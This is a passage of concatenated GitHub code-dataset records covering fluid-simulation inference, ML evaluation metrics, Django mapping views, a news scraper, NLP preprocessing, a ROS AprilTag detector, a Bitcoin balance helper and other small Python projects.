tf.train.Saver(weights)\n\ndirichlet_placeholder_update = lambda dv, tf_pl: update_dirichlet_values(dv,((False, False), (True, False)),tf_pl)\n\nvelocity_all_steps, pressure_all_steps, nn_all_steps, velnew, pnew, NN_out,warn, velocity_all_arrays, pressure_all_arrays = \\\n run_piso_steps(velocity, pressure, domain, physical_parameters, simulation_parameters, training_dict, neural_network,neural_network_wrapper,\n sim_physics, viscosity_field, bcx, bc_placeholders,\n dirichlet_placeholder_update=dirichlet_placeholder_update, loss_buffer_width=loss_buffer_width)\nvelnew_data = velnew.staggered_tensor()\npnew_data = pnew.data\nresidual_force_data = NN_out\n\ndef boundary_perturbation_fun_new(shape,time):\n return boundary_perturbation_fun(domain, physical_parameters['average_velocity'], shape, time, training_dict['dataset_characteristics'][0])\n\ntf.Graph.finalize(tf.get_default_graph())\n\n# SIMULATION RUN -------------------------------------------------------------------------------------------------\nperformance = []\nsession_config = tf.ConfigProto()\nsession_config.gpu_options.allow_growth = True\nwith tf.Session(config=session_config) as sess:\n if load_model_path is not None and training_dict['network_initialiser'] is not None:\n print('LOAD MODEL PATH', load_model_path)\n saver.restore(sess, load_model_path.replace('//','/'))\n\n sub_path = create_base_dir(base_path+learning_dir, '/start_' + str(starting_frame).zfill(6) + '_'+model_id+\n '_pert'+str(training_dict['dataset_characteristics'][0][0])+'-'+str(training_dict['dataset_characteristics'][0][1])+'_')\n 
os.mkdir(sub_path+'/plots')\n\n initial_vel = np.load(training_dict['dataset'] + 'velocity_' + str(starting_frame).zfill(6) + '.npz')['arr_0']\n initial_pre = np.load(training_dict['dataset'] + 'pressure_' + str(starting_frame).zfill(6) + '.npz')['arr_0']\n vel_np = StaggeredGrid(initial_vel, velocity.box).at(velocity)\n p_np = CenteredGrid(initial_pre, pressure.box).at(pressure)\n np.savez(sub_path + '/velocity_' + str(0).zfill(6), vel_np.staggered_tensor())\n np.savez(sub_path + '/pressure_' + str(0).zfill(6), p_np.data)\n if residual_force_data is not None:\n np.savez(sub_path + '/nn_forcing_' + str(0).zfill(6), np.zeros_like(vel_np.staggered_tensor()))\n\n for i in range(1,timesteps):\n # BOUNDARY CONDITION - PERTURBATION -----------------------------------------------------------------------\n if training_dict['perturb_inlet'] == True:\n boundary_perturbation = boundary_perturbation_fun_new(bc_placeholders.shape, simulation_parameters['dt']*starting_frame+\n simulation_parameters['dt']*simulation_parameters['dt_ratio']*i)\n else:\n boundary_perturbation = np.zeros(bc_placeholders.shape)\n\n s = time.time()\n vel_out, p_out, nn_out = sess.run([velnew_data, pnew_data, residual_force_data],\n feed_dict={velocity_placeholder: vel_np.staggered_tensor(),\n pressure_placeholder: p_np.data,\n bc_placeholders: boundary_perturbation})\n f = time.time()\n performance.append(f-s)\n np.savez(sub_path + '/velocity_' + str(i).zfill(6), vel_out)\n np.savez(sub_path + '/pressure_' + str(i).zfill(6), p_out)\n if residual_force_data is not None:\n np.savez(sub_path + '/nn_forcing_' + str(i).zfill(6), nn_out)\n\n if i%50==0:\n plt.figure(figsize=(8,12))\n plt.subplot(5,1,1)\n plt.title(\"v velocity\")\n plt.imshow(vel_out[0,...,0])\n plt.colorbar()\n plt.subplot(5,1,2)\n plt.title(\"u velocity\")\n plt.imshow(vel_out[0,...,1])\n plt.colorbar()\n plt.subplot(5,1,3)\n plt.title(\"p pressure\")\n plt.imshow(p_out[0,...,0])\n plt.colorbar()\n plt.subplot(5,1,4)\n plt.title(\"nn forcing y\")\n plt.imshow(nn_out[0,...,0])\n plt.colorbar()\n plt.subplot(5,1,5)\n plt.title(\"nn forcing x\")\n plt.imshow(nn_out[0,...,1])\n plt.colorbar()\n plt.savefig(sub_path+'/plots/plt_'+str(i))\n plt.close()\n\n vel_np = StaggeredGrid(vel_out, velocity.box)\n p_np = CenteredGrid(p_out, pressure.box)\n\nnp.savez(sub_path+'/performance_'+socket.gethostname(), np.array(performance))","repo_name":"tum-pbs/differentiable-piso","sub_path":"spatial_mixing_layer_differentiable_inference.py","file_name":"spatial_mixing_layer_differentiable_inference.py","file_ext":"py","file_size_in_byte":8905,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"45"} +{"seq_id":"38969791809","text":"import numpy as np\n\n\nclass Evaluator:\n def __init__(self, y_prediction, y_gold, class_labels):\n \"\"\"\n Args:\n y_gold (np.ndarray): the correct ground truth/gold standard labels\n y_prediction (np.ndarray): the predicted labels\n class_labels (np.ndarray): a list of unique class labels. 
Defaults to the union of y_gold and y_prediction.\n \"\"\"\n assert len(y_gold) == len(y_prediction)\n\n self.y_prediction = y_prediction\n self.y_gold = y_gold\n self.classes = class_labels\n\n # Compute the confusion matrix.\n # self.confusion_matrix: np.array, shape (C, C), where C is the number of classes.\n # Rows are ground truth per class, columns are predictions\n self.confusion = np.zeros((len(self.classes), len(self.classes)))\n for (i, label) in enumerate(self.classes):\n indices = (self.y_gold == label)\n predictions = self.y_prediction[indices]\n\n (unique_labels, counts) = np.unique(predictions, return_counts=True)\n\n frequency_dict = dict(zip(unique_labels, counts))\n\n for (j, class_label) in enumerate(self.classes):\n self.confusion[i, j] = frequency_dict.get(class_label, 0)\n\n def accuracy(self):\n \"\"\"\n Compute the accuracy given the ground truth and predictions\n\n Returns:\n float : the accuracy\n \"\"\"\n try:\n return np.sum(self.y_gold == self.y_prediction) / len(self.y_gold)\n except ZeroDivisionError:\n return 0.\n\n @staticmethod\n def accuracy_from_confusion(confusion):\n \"\"\"\n Compute the accuracy given the confusion matrix\n Returns:\n float : the accuracy\n \"\"\"\n\n if np.sum(confusion) > 0:\n return np.sum(np.diag(confusion)) / np.sum(confusion)\n else:\n return 0.\n\n @staticmethod\n def precision(confusion):\n \"\"\"\n Compute the precision score per class given the ground truth and predictions\n Also return the macro-averaged precision across classes.\n Returns:\n tuple: returns a tuple (precisions, macro_precision) where\n - precisions is a np.ndarray of shape (C,), where each element is the\n precision for class c\n - macro-precision is macro-averaged precision (a float)\n \"\"\"\n\n p = np.zeros((len(confusion),))\n for c in range(confusion.shape[0]):\n if np.sum(confusion[:, c]) > 0:\n p[c] = confusion[c, c] / np.sum(confusion[:, c])\n\n # Compute the macro-averaged precision\n macro_p = 0.\n if len(p) > 0:\n macro_p = np.mean(p)\n\n return p, macro_p\n\n @staticmethod\n def recall(confusion):\n \"\"\"\n Compute the recall score per class given the ground truth and predictions\n Also return the macro-averaged recall across classes.\n Returns:\n tuple: returns a tuple (recalls, macro_recall) where\n - recalls is a np.ndarray of shape (C,), where each element is the\n recall for class c\n - macro-recall is macro-averaged recall (a float)\n \"\"\"\n\n r = np.zeros((len(confusion),))\n for c in range(confusion.shape[0]):\n if np.sum(confusion[c, :]) > 0:\n r[c] = confusion[c, c] / np.sum(confusion[c, :])\n\n # Compute the macro-averaged recall\n macro_r = 0.\n if len(r) > 0:\n macro_r = np.mean(r)\n\n return r, macro_r\n\n @staticmethod\n def f1_score(confusion):\n \"\"\"\n Compute the F1-score per class given the ground truth and predictions\n Also return the macro-averaged F1-score across classes.\n Returns:\n tuple: returns a tuple (f1s, macro_f1) where\n - f1s is a np.ndarray of shape (C,), where each element is the\n f1-score for class c\n - macro-f1 is macro-averaged f1-score (a float)\n \"\"\"\n\n (precisions, macro_p) = Evaluator.precision(confusion)\n (recalls, macro_r) = Evaluator.recall(confusion)\n\n # just to make sure they are of the same length\n assert len(precisions) == len(recalls)\n\n f = np.zeros((len(precisions),))\n for c, (p, r) in enumerate(zip(precisions, recalls)):\n if p + r > 0:\n f[c] = 2 * p * r / (p + r)\n\n # Compute the macro-averaged F1\n macro_f = 0.\n if len(f) > 0:\n macro_f = np.mean(f)\n\n return f, 
macro_f\n\n def get_confusion_by_label(self, label):\n \"\"\"\n\n Args:\n label: the specific label we want to compute confusion matrix for\n\n Returns:\n confusion matrix by class\n \"\"\"\n confusion = np.zeros((2, 2))\n\n confusion[0, 0] = len([i for (i, v) in enumerate(self.y_prediction) if self.y_gold[i] == self.y_gold[i]\n and v == label])\n confusion[0, 1] = len(self.y_gold == label) - confusion[0, 0]\n confusion[1, 0] = len(self.y_prediction == label) - confusion[0, 0]\n confusion[1, 1] = len(self.y_gold != label) - confusion[1, 0]\n\n return confusion\n\n @staticmethod\n def get_confusion_by_label_from_confusion(label, confusion):\n \"\"\"\n\n Args:\n label: the index of the specific label in classes, we want to compute confusion matrix for this specific label\n confusion: original multi-class confusion matrix\n Returns:\n confusion matrix by class\n \"\"\"\n assert label < len(confusion)\n\n label_confusion = np.zeros((2, 2))\n label_confusion[0, 0] = confusion[label, label]\n label_confusion[0, 1] = np.sum(confusion[label, :]) - label_confusion[0, 0]\n label_confusion[1, 0] = np.sum(confusion[:, label]) - label_confusion[0, 0]\n label_confusion[1, 1] = np.sum(confusion) - label_confusion[0, 0] - label_confusion[0, 1] - label_confusion[1, 0]\n\n return label_confusion\n","repo_name":"yisiang-ong/decision_tree","sub_path":"Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":6075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30898366020","text":"from multiprocessing import context\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Site\nimport folium\n\n\ndef index(request):\n context = {}\n query = ''\n if request.GET:\n query = request.GET['q']\n context['query'] = str(query)\n\n bgzsites = Site.objects.get_queryset()\n print(bgzsites)\n\n if len(bgzsites):\n\n m = folium.Map(width=600, height=300,location=[32.098084,20.091047], zoom_start=13)\n for i in range(0,len(bgzsites)):\n folium.Marker([bgzsites[i].siteLatitude, bgzsites[i].siteLongitude], popup=bgzsites[i].siteName).add_to(m)\n m = m._repr_html_()\n context = {\n 'bgzsites':bgzsites,\n 'MAP':m\n }\n return render(request, 'home.html',context)\n\n\ndef city(request, cityName):\n cityName = str(cityName)\n print(cityName)\n citySites = Site.objects.filter(siteCity=cityName)\n # except Eastsites.DoesNotExist:\n print(citySites[0].siteLatitude)\n m = folium.Map(width=600, height=300,location=[citySites[0].siteLatitude, citySites[0].siteLongitude], zoom_start=13)\n # tooltip = 'Click For More Info'\n for i in range(0,len(citySites)):\n folium.Marker([citySites[i].siteLatitude, citySites[i].siteLongitude], popup=citySites[i].siteName).add_to(m)\n m = m._repr_html_()\n context = {\n 'citySites':citySites,\n 'MAP':m\n }\n return render(request, \"cities.html\", context)\n\n\n\ndef site(request, pk):\n print(pk)\n singleSite = Site.objects.filter(id=pk)\n print(singleSite[0])\n m = folium.Map(width=600, height=300,location=[singleSite[0].siteLatitude, singleSite[0].siteLongitude], zoom_start=13)\n folium.Marker([singleSite[0].siteLatitude, singleSite[0].siteLongitude], popup=singleSite[0].siteName).add_to(m)\n m = m._repr_html_()\n context = {\n 'singleSite': singleSite[0],\n 'MAP':m\n }\n return render(request, 
\"single.html\",context)","repo_name":"Muftah-Elzawi/LTT-Docs-Site","sub_path":"EastSites/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"26806375772","text":"text = \"{[()]}\"\ndef is_closed(text:str):\n stack = []\n brackets = {')':'(',']':'[','}':'{'}\n for char in text:\n if char in brackets.values():\n stack.append(char)\n elif char in brackets.keys():\n if brackets[char] != stack.pop():\n return False\n return True\n\nprint(is_closed(text))\n\n\n\n","repo_name":"sctu/sctu-ds-2019","sub_path":"1806101093王宇/lab02/test02.py","file_name":"test02.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"45"} +{"seq_id":"40810738887","text":"class Solution:\n def numberOfWays(self, s: str) -> int:\n number_10 = defaultdict(int)\n number_01 = defaultdict(int)\n number_101 = number_010 = count_0 = count_1 = cur_01 = cur_10 = 0\n for i in range(len(s)):\n if s[i] == '1':\n count_1 += 1\n number_01[i] = count_0 + cur_01\n cur_01 = number_01[i]\n number_10[i] = cur_10\n \n if s[i] == '0':\n count_0 += 1\n number_10[i] = count_1 + cur_10\n cur_10 = number_10[i]\n number_01[i] = cur_01\n \n for i in range(len(s)):\n if s[i] == '1':\n number_101 += number_10[i]\n else:\n number_010 += number_01[i]\n \n return number_101 + number_010\n","repo_name":"birukayalew/Competitive-Programming","sub_path":"2222-number-of-ways-to-select-buildings/2222-number-of-ways-to-select-buildings.py","file_name":"2222-number-of-ways-to-select-buildings.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"69964068935","text":"# -*- coding: utf-8 -*-\n\"\"\"isolezwelesixhosa_scrap_links.ipynb\nCode for scrapping news text from https://www.isolezwelesixhosa.co.za\n\nAuthor: Jesujoba Alabi\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib import request\nfrom urllib.request import Request, urlopen\nagent = {\"User-Agent\":'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'}\n\n#define new category aside from the home page\ncategory = ['iindaba','ezemidlalo','ezoyolo','izimvo']\n#get the number of `featured` pages each of the categories have\ndef get_no_featuredpages(catgory):\n url = \"https://www.isolezwelesixhosa.co.za/\"+catgory+\"?filter_by=featured\"\n reqs = requests.get(url, headers=agent)\n soup = BeautifulSoup(reqs.content, 'lxml')\n res = soup.find('span',{'class':'pages'})\n return int(res.text.split()[-1])\n\n#scrap links from the different categories \ndef scrap_link(catgory, catgory_size):\n urls = []\n print(\"Getting the URL from the category : \", catgory, \" (featured) with \", catgory_size, \" pages . \" )\n for p in range(catgory_size):\n url = 'https://www.isolezwelesixhosa.co.za/'+catgory+'/page/'+str(p+1)+'?filter_by=featured'\n #print(url)\n reqs = requests.get(url, headers=agent)\n soup = BeautifulSoup(reqs.content, 'lxml')\n res = soup.find_all('div',{'class':'td-module-thumb'})#.find_all(\"a\", href=True)\n #print(res)\n urls.extend([t.a['href'] for t in res])\n #return all the news article links from the category\n return urls\n\n#scrap the articles with links in the `urls` variable\ndef getSoup(links):\n print(\"getting soup objects for all the links ... 
\")\n soupx = []\n cnt=0\n for url in links: \n page_request = request.Request(url, headers=agent)\n page = request.urlopen(page_request)\n #response = requests.get(page_url)\n #print(page.getcode())\n soup = BeautifulSoup(page, 'html.parser')\n soupx.append(soup)\n cnt = cnt + 1\n progresse = (cnt/len(links) * 100) \n if progresse % 10 == 0:\n print (\"Got \", progresse, \"% of soup objects\")\n print(\"got the soup object for all the links ... \")\n return soupx\n\ndef getcontent(soupx):\n print(\"scrapping the articles ... \")\n cnt=0;\n title=[];time=[]; texts=[]\n for soups in soupx:\n cnt=cnt+1\n if soups.find(\"h1\", {\"class\":\"entry-title\"})!= None:\n title.append(soups.find(\"h1\", {\"class\":\"entry-title\"}).text.replace(\"\\t\",\"\").replace(\"\\n\",\"\"))\n else:\n title.append(\"\")\n if soups.find(\"time\", {\"class\":\"entry-date updated td-module-date\"})!= None:\n time.append(soups.find(\"time\", {\"class\":\"entry-date updated td-module-date\"}).text.replace(\"\\t\",\"\").replace(\"\\n\",\"\"))\n else:\n time.append(\"\")\n \n if soups.find(\"div\", {\"class\":\"td-post-content\"})!=None:\n result = soups.find(\"div\", {\"class\":\"td-post-content\"}).findAll('p')\n txtstring=\"\"\n for x in result:\n #print (x.text)\n txtstring+=x.text.replace(u'\\xa0', u' ').replace('\\n',\" \")+\" \\n\"\n texts.append(txtstring.strip())\n else:\n texts.append(\"\") \n\n progresse = (cnt/len(soupx) * 100) \n if progresse % 10 == 0:\n print (\"Scrapped \", progresse, \"% of the articles\")\n\n return title,time,texts\n\ncat_len = [get_no_featuredpages(cat) for cat in category]\nprint(\"Got the following size for each category = \", cat_len)\nurls = set([scrap_link(category[i], cat_len[i]) for i in range(len(category))][0])\n\nsoups = getSoup(list(urls))\ntitle,time,texts = getcontent(soups)\n#create a dictionarty\nimport pandas as pd\nd = {'Date':time,'Title':title,'Text':texts}\ndf = pd.DataFrame(d)\n\nprint(df)\n\n#write the dataframe to file\ndf.to_csv(r'xhosa_news.csv')\n\n","repo_name":"ajesujoba/afrikcrawler","sub_path":"isolezwelesixhosa/isolezwelesixhosa_scrap_links.py","file_name":"isolezwelesixhosa_scrap_links.py","file_ext":"py","file_size_in_byte":3639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"73576658055","text":"from datetime import datetime\nfrom pydantic import validate_arguments\n\nclass ConfiguracaoDTO:\n @validate_arguments\n def __init__(self, status:bool, aluno_ausente:int, inicio_aula:datetime, fim_aula:datetime):\n self.status = status\n self.aluno_ausente = aluno_ausente\n self.inicio_aula = inicio_aula\n self.fim_aula = fim_aula\n\n","repo_name":"xtokram/app-presente","sub_path":"backend/src/dtos/ConfiguracaoDTO.py","file_name":"ConfiguracaoDTO.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"45"} +{"seq_id":"73609179642","text":"# -*- coding: utf-8 -*-\n# @File : sentence_split.py\n# @Author: ChangSiteng\n# @Date : 2019-06-26\n# @Desc : 1. 分词的工作\n# 2. 
表情符号切分的工作\nimport shutil\nimport sys\nimport os\ncurPath = os.path.abspath(os.path.dirname(__file__))\nrootPath = os.path.split(curPath)[0]\nsys.path.append(rootPath)\n\nimport json\nimport pickle\nimport re\n\nimport jieba\n\nfrom data_utils.nlpcc_parse import Parse\n\npunctuations = [',', '。', '?', '~', '!', '、', '……']\n\nclass SentenceSplit:\n\n datas = []\n pattern = ''\n emoji_pattern = ''\n\n def __init__(self,path):\n parse = Parse()\n self.datas = parse.parse(path)\n self.pattern = SentenceSplit.get_pattern()\n self.emoji_pattern = r'\\[(\\w*)\\]'\n\n # 静态方法\n @staticmethod\n def get_pattern():\n pattern = ''\n for punctuation in punctuations:\n pattern += punctuation + \"|\"\n pattern = pattern[:-1]\n return pattern\n\n def sentence_split(self, path, iftrain):\n # 这里是获取的每一句话,需要做分词的工作,我们再在这里做将表情符号切分的工作\n for example in self.datas:\n # print(sentence)\n sentence = example['sentence']\n sentence_no_emoji_split = ''\n emoji_list = []\n emoji_count = []\n # 1 首先表情符号的纯文本\n sentence_no_emoji = re.sub(self.emoji_pattern, '', sentence)\n # 2 按照标点符号切分子句\n short_sentences = re.split(self.pattern,sentence)\n punctuations = re.findall(self.pattern,sentence) # 为了保持标点符号的一致\n # 3在每个子句中看是否有表情符号,这是因为子句后的表情符号会对子句产生影响\n for short_sentence in short_sentences:\n if short_sentence.strip() == '':\n continue\n emojis = re.findall(self.emoji_pattern, short_sentence)\n print(emojis)\n emoji_list.append(list(emojis))\n\n # 4根据除去表情符号的子句,再分词\n short_entence_no_emoji = re.sub(r'\\[(\\w*)\\]', '', short_sentence)\n sentence_no_emoji_split_temp = \" \".join(self.word_split(short_entence_no_emoji))\n sentence_no_emoji_split = sentence_no_emoji_split + str(sentence_no_emoji_split_temp)\n index = short_sentences.index(short_sentence)\n if len(punctuations) > index:\n sentence_no_emoji_split = sentence_no_emoji_split + punctuations[index]\n\n example['sentence_no_emoji'] = sentence_no_emoji\n example['emoji'] = (emoji_list)\n example['sentence_no_emoji_split'] = sentence_no_emoji_split\n\n #https://blog.csdn.net/weixin_43896398/article/details/85559172\n # torchtext能够读取的json文件和我们一般意义上的json文件格式是不同的(这也是比较坑的地方),我们需要把上面的数据处理成如下格式:\n #\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n # {\"source\": \"10 111 2 3\", \"target\": \"1 1 2 2\"}\n #可以看到,里面的内容和通常的Json并无区别,每个字段采用字典的格式存储。\n # 不同的是,多个json序列中间是以换行符隔开的,而且最外面没有列表。\n\n with open(path, 'w+') as fw:\n for example_data in self.datas:\n encode_json = json.dumps(example_data)\n # 一行一行写入,并且采用print到文件的方式\n print(encode_json, file=fw)\n\n # json_data = json.dumps(self.datas)\n # with open(path, 'w+',encoding='utf-8') as f_six: # w+用于读写,覆盖\n # f_six.write(json_data)\n print(\"load data并保存在\",path)\n\n if iftrain:\n # 将分好的词划分出来,拼接到一起,方便glove训练\n with open('words_origin.txt','w+') as fw:\n for example_data in self.datas:\n print(example_data['sentence_no_emoji_split'],file=fw)\n print(\"分词TXT已经保存在words_origin.txt中\")\n # 将表情符单词 供glove词向量\n with open('emojis_origin.txt','w+') as fw:\n for example_data in self.datas:\n temp = ''\n emojis_origin = example_data['emoji']\n for emoji_origin in emojis_origin:\n if len(emoji_origin) > 0:\n for emoji_temp in emoji_origin:\n temp += emoji_temp + ' '\n if len(temp) > 0 :\n print(temp,file=fw)\n print(\"表情分词TXT已经保存在emojis_origin.txt中\")\n\n\n def word_split(self,sentence):\n\n return list(sentence)\n\n\nif __name__=='__main__':\n\n # train_xml_path = 
\"../../data/nlpcc2014/Training data for Emotion Classification.xml\"\n # split = SentenceSplit(train_xml_path)\n # split.sentence_split(\"../data/train_data.json\",True)\n #\n # train_xml_path = \"../../data/nlpcc2014/EmotionClassficationTest.xml\"\n # split = SentenceSplit(train_xml_path)\n # split.sentence_split(\"../data/test_data.json\",False)\n\n '''\n 2.\n words_origin.txt\\emoji_origin.txt放入glove中,demo.sh, 得到glove.emojis.300.vectors.txt、glove.words.300.vectors.txt\n '''\n glove_words_origin_path = \"../../Glove/words_origin.txt\"\n shutil.copy(\"words_origin.txt\",glove_words_origin_path)\n glove_emojis_origin_path = \"../../Glove/emojis_origin.txt\"\n shutil.copy(\"emojis_origin.txt\", glove_emojis_origin_path)\n os.system('cd ../../Glove && ./demo.sh')\n os.system('cd ../../Glove && ./demo1.sh')\n '''\n 3.\n 得到的glove.emojis.300.vectors.txt、glove.words.300.vectors.txt放入.vector_cache中\n '''\n glove_words_300_vector_path = \"../../Glove/glove.words.300.vectors.txt\"\n shutil.copy(glove_words_300_vector_path,\"../.vector_cache/glove.words.300.vectors.txt\")\n glove_emojis_300_vector_path = \"../../Glove/glove.emojis.300.vectors.txt\"\n shutil.copy(glove_emojis_300_vector_path,\"../.vector_cache/glove.emojis.300.vectors.txt\")","repo_name":"CstomRita/AS-LSTM","sub_path":"train_06_character/data/sentence_split.py","file_name":"sentence_split.py","file_ext":"py","file_size_in_byte":6399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"72339515962","text":"#!/usr/bin/env python3\n\nimport cv2\nimport rospy\nimport argparse\nimport apriltag\nfrom std_msgs.msg import String\nimport time\nimport math\n\n\nlist = [[304, 112], [304, 361], []]\n\n\nclass CameraDriver:\n def __init__(self, args):\n rospy.init_node('camera_driver')\n self.pub1 = rospy.Publisher(\"apriltag_centre1\", String, queue_size=1)\n self.last = time.time()\n self.debug = args.debug\n self.source = int(\n args.source) if args.source.isdigit() else args.source\n\n def publish(self):\n cap = cv2.VideoCapture(self.source)\n # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 800)\n # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 600)\n print(cap.get(cv2.CAP_PROP_FPS))\n\n while cap.isOpened() and not rospy.is_shutdown():\n ret, frame = cap.read()\n now = time.time()\n now = now-self.last\n self.last = self.last+now\n if not ret:\n break\n try:\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n options = apriltag.DetectorOptions('tag36h11')\n detector = apriltag.Detector(options)\n results = detector.detect(gray)\n pStr = \"FPS: {} delay : {}ms \".format(\n int(1/now), int(1000*now))\n for i in results:\n pta, ptb, ptc, ptd = i.corners\n cn = i.center\n pta = (int(pta[0]), int(pta[1]))\n ptb = (int(ptb[0]), int(ptb[1]))\n ptc = (int(ptc[0]), int(ptc[1]))\n ptd = (int(ptd[0]), int(ptd[1]))\n pte = (int((pta[0]+ptb[0])/2), int((pta[1]+ptb[1])/2))\n cn = (int(cn[0]), int(cn[1]))\n pStr += \"Center []: {},{} \".format(cn[0], cn[1])\n cv2.rectangle(frame, pta, ptc, (0, 255, 0), 2)\n cv2.circle(frame, cn, 3, (0, 0, 255), -1)\n cv2.circle(frame, pte, 3, (0, 0, 255), -1)\n theta = math.degrees(math.atan2(\n pte[1]-cn[1], pte[0]-cn[0]))\n ptr = str(cn[0])+\" \"+str(cn[1])+\" \"+str(theta)\n print(ptr)\n self.pub1.publish(ptr)\n print(pStr)\n if self.debug:\n frame = cv2.line(\n frame, (list[1][0], list[1][1]), (list[0][0], list[0][1]), (0, 255, 0), 2)\n cv2.imshow(\"Frame\", frame)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n pass\n\n except Exception as e:\n print(e)\n\n\nif __name__ == '__main__':\n 
parser = argparse.ArgumentParser('Camera Driver')\n parser.add_argument('source', nargs='?', type=str, default='0')\n parser.add_argument('-d', '--debug', type=bool, default='true')\n parser.add_argument('-t', '--topic', type=str,\n default='/overhead_camera/image_raw')\n args = parser.parse_args()\n\n camera_driver = CameraDriver(args)\n try:\n camera_driver.publish()\n except Exception as e:\n print(e)\n","repo_name":"Alok-ux/FlipkartGrid","sub_path":"grid_utils/apriltag_detector/scripts/camera_driver_new.py","file_name":"camera_driver_new.py","file_ext":"py","file_size_in_byte":3142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"11201634488","text":"from selenium import webdriver\r\nfrom time import sleep\r\n\r\n\r\ndef open_browser():\r\n teamnumber = 3751\r\n PATH = r\"D:\\python\\Space ac\\US-cansat\\chromedriver.exe\"\r\n driver = webdriver.Chrome(PATH)\r\n driver.get(\"http://cansat.info/plot.html\")\r\n driver.find_element_by_id(\"team\").send_keys(teamnumber)\r\n driver.find_element_by_xpath(\"/html/body/p[8]/button\").click()\r\n sleep(10000)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n open_browser()\r\n","repo_name":"Retaehc-pop/US-cansat","sub_path":"Groundstation/web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"41"} +{"seq_id":"26270150819","text":"\n\nimport pytest\n\nfrom .conftest import get_config\n\n\n@pytest.mark.parametrize('fixture,is_test', [\n ('true', True),\n ('no-key', False),\n ('false', False),\n])\ndef test_is_test(fixture, is_test):\n\n config = get_config('is_test/{0}'.format(fixture))\n\n assert config.is_test() == is_test\n","repo_name":"davidmcclure/open-syllabus-project","sub_path":"osp/test/common/config/test_is_test.py","file_name":"test_is_test.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":195,"dataset":"github-code","pt":"41"} +{"seq_id":"21331706345","text":"import pickle\n\nimport requests\n\nfrom django.conf import settings\n\n\ndef get_balances(*addresses, use_cache=False):\n retval = {}\n\n if use_cache:\n for address in addresses:\n balance = settings.REDIS.get(f'{address}_balance')\n if balance is not None:\n retval[address] = balance\n\n if set(addresses) != set(retval) and addresses:\n resp = requests.get(\n f'https://api.blockchair.com/bitcoin/addresses/balances?addresses={\",\".join(addresses)}'\n )\n resp.raise_for_status()\n data = resp.json()['data'] or {}\n for address, satoshis in data.items():\n retval[address] = satoshis\n settings.REDIS.set(f'{address}_balance', satoshis)\n return retval\n\n\ndef get_transactions(address, use_cache=False):\n retval = []\n\n if use_cache:\n transactions = settings.REDIS.get(f'{address}_transactions')\n if transactions:\n retval = pickle.loads(transactions)\n\n if not retval:\n resp = requests.get(\n f'https://bch-chain.api.btc.com/v3/address/{address}/tx'\n )\n try:\n resp.raise_for_status()\n except requests.HTTPError:\n retval = []\n else:\n retval = resp.json()['data']['list']\n settings.REDIS.set(\n f'{address}_transactions',\n pickle.dumps(retval)\n )\n return retval\n","repo_name":"nav3van/bitcoin-tracker","sub_path":"app/bitcoin_tracker/util/bitcoin.py","file_name":"bitcoin.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"4359178146","text":"n = 
int(input())\nm = int(input())\nsymb = input()\n\nfor i in range(n):\n if not i or i == n - 1:\n print(symb * m)\n continue\n for j in range(m):\n if not j or j == m - 1:\n print(symb, end='')\n else:\n print(' ', end='')\n print()\n","repo_name":"hom1c1d3/yandex_lyceum","sub_path":"Основы программирования на языке Python/8. Вложенные циклы/rectangle_ascii.py","file_name":"rectangle_ascii.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"41"} +{"seq_id":"21128684054","text":"#kullanıcı 3 sayı girsin bunlardan en büyüğünü versin\nsayi1 = int(input (\"sayi 1:\"))\nsayi2 = int(input (\"sayi 2:\"))\nsayi3 = int(input (\"sayi 3:\"))\n\nif sayi1>sayi2 and sayi1>sayi3:\n print (\"en büyük sayi1\")\nelif sayi2>sayi1 and sayi2>sayi3:\n print (\"en büyük sayi2\")\nelif sayi3>sayi1 and sayi3>sayi2:\n print (\"en büyük sayi 3. sayı olan\", sayi3)","repo_name":"cgtyyldrm/PythonKamp","sub_path":"workshop4.py","file_name":"workshop4.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"283303693","text":"from tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import messagebox\r\nimport random\r\nimport sort_algorithms\r\n\r\nveri = []\r\nroot = Tk()\r\nroot.title(\"Sıralama Algoritması 